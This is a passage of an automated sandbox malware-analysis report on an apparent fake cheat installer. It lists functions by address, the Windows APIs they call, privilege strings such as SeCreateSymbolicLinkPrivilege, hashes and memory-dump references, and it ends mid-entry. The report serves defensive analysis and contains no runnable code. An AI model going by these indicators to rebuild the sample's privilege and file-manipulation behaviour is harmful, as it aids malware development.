                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                                  • Instruction ID: 492b4202ac24671368ae304ad4bffd61938ed5700dbffa8b049fb1f51d2c789e
                                                                                                  • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                                  • Instruction Fuzzy Hash: 18F08C10F0920748FF646FB39C103B812915F847A2F085730DDEEC62C2DE2CE680A291
                                                                                                  Function 00007FF6C16C20D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF6C16C207E), ref: 00007FF6C16C20F6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                  • String ID:
                                                                                                  • API String ID: 2591292051-0
                                                                                                  • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                                  • Instruction ID: 3faf53ea4168729f48be6e61bf52eb013c2b867d96197ed1e489dbf5929ab00a
                                                                                                  • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                                  • Instruction Fuzzy Hash: 6BF0C222A0868285FF249F32E0557792761EB54B7BF584338EBFC815D5CF28D8A5E300
                                                                                                  Function 00007FF6C16C2490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3081899298-0
                                                                                                  • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                                  • Instruction ID: e93af9bd0791ba9af22a0bbe25701c7d2357157f127e4de041d63e8aff357982
                                                                                                  • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                                  • Instruction Fuzzy Hash: 0ED01212E0A841C3DF10AB3BD86103C6360AF92736FA44770DAFEC16E1CE1D9496B311
                                                                                                  Function 00007FF6C16C7FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611563598-0
                                                                                                  • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                                  • Instruction ID: afdc5250f0eae28fcebc836f6b8460cce7dabbc33cb4295ab1c4325d6f018f75
                                                                                                  • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                                  • Instruction Fuzzy Hash: 87C08C20F05503C1DF086F2BC8C911813A8FB60B06BA08034C19CC1220CE2CC4FAB349

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FF6C16BC2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                  • API String ID: 2659423929-3508440684
                                                                                                  • Opcode ID: 133043678a36d966ba880c912d6856c5696a7c6c433e50d223eb52f27bd95b56
                                                                                                  • Instruction ID: 16e52920fdc20863f6a0444674d8691fcf1c6ea1ca407f1b4dc56c1e5e93507c
                                                                                                  • Opcode Fuzzy Hash: 133043678a36d966ba880c912d6856c5696a7c6c433e50d223eb52f27bd95b56
                                                                                                  • Instruction Fuzzy Hash: F962C162F1864285FB00DF76D8542BD2361AF857A9F504231EAEC97AD6DF3CE285E340
                                                                                                  Function 00007FF6C16C1A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                                  • String ID: rtmp
                                                                                                  • API String ID: 3587137053-870060881
                                                                                                  • Opcode ID: 3dcc5890c2e22e4a5feb2ae31f1f4ae3f3b67a4ee4a7a529d594af89e49fc87b
                                                                                                  • Instruction ID: 62802d691b95bcea3dc670027573de9d91d1706899237e66538ca52dfa85ab60
                                                                                                  • Opcode Fuzzy Hash: 3dcc5890c2e22e4a5feb2ae31f1f4ae3f3b67a4ee4a7a529d594af89e49fc87b
                                                                                                  • Instruction Fuzzy Hash: 64F1C132B18A4291EF10EF6AD8901BD67A1EB963C5F500136EACDC3AA9DF3CD584D740
                                                                                                  Function 00007FF6C16C5B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1693479884-0
                                                                                                  • Opcode ID: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                                                                                                  • Instruction ID: 2659ecbc7e77a3144d755f54f8d5c771a0bec3d97419d68601c771d645ac7c22
                                                                                                  • Opcode Fuzzy Hash: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                                                                                                  • Instruction Fuzzy Hash: 71A1A062F14B5284FF009F7A9C541BC2761AF89BA5B149235DEED97BC9DE3CE0829240
                                                                                                  Function 00007FF6C16E3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3140674995-0
                                                                                                  • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                                  • Instruction ID: c2902330ccee5b2e0289087822cd8905603ff7abb1b7b76b72f49d0ec68198ed
                                                                                                  • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                                  • Instruction Fuzzy Hash: 67315072608B818AEB608FA1E8503ED7364FB84745F448539DACD87BA8DF38D658D710
                                                                                                  Function 00007FF6C16E76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1239891234-0
                                                                                                  • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                                  • Instruction ID: 54fbc81325ca0b5a533812e316208b3e634a0e213783f662f5ab68eed4bbf69b
                                                                                                  • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                                  • Instruction Fuzzy Hash: D8318136608B8185EB20CF66EC402AE73A4FB88755F500235EADD83B69DF38C655CB40
                                                                                                  Function 00007FF6C16B1AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: 64d25151ef3fe23f20685aee3441bda27b372bcb0863407ca166e54c625fc733
                                                                                                  • Instruction ID: 523ebcd67e6c8757fe5726810a18e6e01a6f5527e9d77b6d250dfa38965a4746
                                                                                                  • Opcode Fuzzy Hash: 64d25151ef3fe23f20685aee3441bda27b372bcb0863407ca166e54c625fc733
                                                                                                  • Instruction Fuzzy Hash: A2B1D162B1468695EB109F66E8542ED2361FF86785F505231EACC87BDAEF3CD540E340
                                                                                                  Function 00007FF6C16EFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C16EFAC4
                                                                                                    • Part of subcall function 00007FF6C16E7934: GetCurrentProcess.KERNEL32(00007FF6C16F0CCD), ref: 00007FF6C16E7961
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                  • String ID: *?$.
                                                                                                  • API String ID: 2518042432-3972193922
                                                                                                  • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                                  • Instruction ID: 0d2991e6c3cd52721d7b268985e19da28f094ac30b60bac0ffb610d03dc6ed54
                                                                                                  • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                                  • Instruction Fuzzy Hash: F9510162B14A9582EF10DFA39C100B963A0FF48BD9B5446B1DEDD87B88EF3CD5429340
                                                                                                  Function 00007FF6C16BB6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                  • String ID:
                                                                                                  • API String ID: 1365068426-0
                                                                                                  • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                                  • Instruction ID: dd4e0f1304cd7fe22b942740362c0699eb8e06b63fa373520b1b0ce821d43970
                                                                                                  • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                                  • Instruction Fuzzy Hash: AC01FF7170C74282E7109F23B89067AA395FB89BC2F484034EADD87B49CE3CD515E744
                                                                                                  Function 00007FF6C16EFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .
                                                                                                  • API String ID: 0-248832578
                                                                                                  • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                                  • Instruction ID: 39ce3eec8c632e83e6e0c4bbc3ecb2317d87902ad35c6785dda300f7515ea214
                                                                                                  • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                                  • Instruction Fuzzy Hash: F5310B22B0869146F7209E379C057B96A91AF94FE4F148375DEEC87BC5DE3CD6019340
                                                                                                  Function 00007FF6C16DA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                  • String ID:
                                                                                                  • API String ID: 2169056816-0
                                                                                                  • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                                  • Instruction ID: 8bb6bd93126ed2f4cc23e71975b52665b09cf22156725bfb087e64dc6405a013
                                                                                                  • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                                  • Instruction Fuzzy Hash: B2118926A08B8595E761CF22E8103EA7360FF88B85F844135DACC83769DF3CE285C744
                                                                                                  Function 00007FF6C16C51A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Version
                                                                                                  • String ID:
                                                                                                  • API String ID: 1889659487-0
                                                                                                  • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                                  • Instruction ID: 87fa44934095c9cac42924ea135bd6b9bf5884547dce9d874aafaf881bcfcfdf
                                                                                                  • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                                  • Instruction Fuzzy Hash: 96011775A086828AE724DF02E86077A37A2BB98316F600234E5DD83791DF3CE5009E10
                                                                                                  Function 00007FF6C16F0D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                  • Instruction ID: b55ff43e3593ebe6cda9f549b149de79449654801b769aa370b0863b7119834e
